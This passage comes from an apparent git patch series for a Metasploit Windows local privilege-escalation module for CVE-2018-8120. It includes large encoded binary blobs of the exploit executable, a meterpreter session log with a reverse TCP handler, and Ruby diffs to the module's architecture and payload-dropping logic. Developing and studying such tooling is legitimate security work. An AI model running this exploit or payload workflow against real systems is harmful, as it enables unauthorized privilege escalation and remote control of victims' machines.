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 getuid Server username: zero-PC\zero meterpreter > background [*] Backgrounding session 1... -msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec -msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1 +msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc +msf exploit(windows/local/ms18_8120_win32k_privesc) > set SESSION 1 SESSION => 1 -msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102 +msf exploit(windows/local/ms18_8120_win32k_privesc) > set LHOST 192.168.1.102 LHOST => 192.168.1.102 -msf exploit(windows/local/ms18_8120_win32k_privsec) > run +msf exploit(windows/local/ms18_8120_win32k_privesc) > run [*] Started reverse TCP handler on 192.168.1.102:4444 [+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 699b58d518..4538e109dd 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -93,9 +93,13 @@ class MetasploitModule < Msf::Exploit::Local def check_arch sys_arch = sysinfo['Architecture'] - if sys_arch == ARCH_X86 || (sys_arch == ARCH_X64 && session.arch == ARCH_X86) + if sys_arch == ARCH_X86 + fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 + 'CVE-2018-8120x86.exe' elsif sys_arch == ARCH_X64 + 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86 + 'CVE-2018-8120x64.exe' else fail_with(Failure::BadConfig, "Invalid architecture") From 96eeaf7da36a9dbe08eb53f538f798c781fe4095 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Fri, 12 Oct 2018 11:47:53 +0530 Subject: [PATCH 33/39] Made few changes Thank you bcoles --- modules/exploits/windows/local/ms18_8120_win32k_privesc.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 4538e109dd..b8d46b0040 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -96,9 +96,8 @@ class MetasploitModule < Msf::Exploit::Local if sys_arch == ARCH_X86 fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 - 'CVE-2018-8120x86.exe' elsif sys_arch == ARCH_X64 - 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86 + return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86 'CVE-2018-8120x64.exe' else @@ -116,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + tempexename = Rex::Text.rand_text_alpha(6..14) cmd = "#{tempdir}\\#{tempexename}.exe" vprint_status("Preparing payload at #{cmd}") From 26631bcfbdf1b5512ef12f818d8768e50efb582d Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Fri, 12 Oct 2018 14:35:42 -0500 Subject: [PATCH 34/39] addressed suggestions --- .../CVE-2018-8120/CVE-2018-8120x86_64.exe | Bin 83456 -> 0 bytes .../windows/local/ms18_8120_win32k_privesc.rb | 57 ++++++++---------- 2 files changed, 24 insertions(+), 33 deletions(-) delete mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe deleted file mode 100755 index e39c4c076fcd935f4cd2c26187f922233f8e2d44..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 83456 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 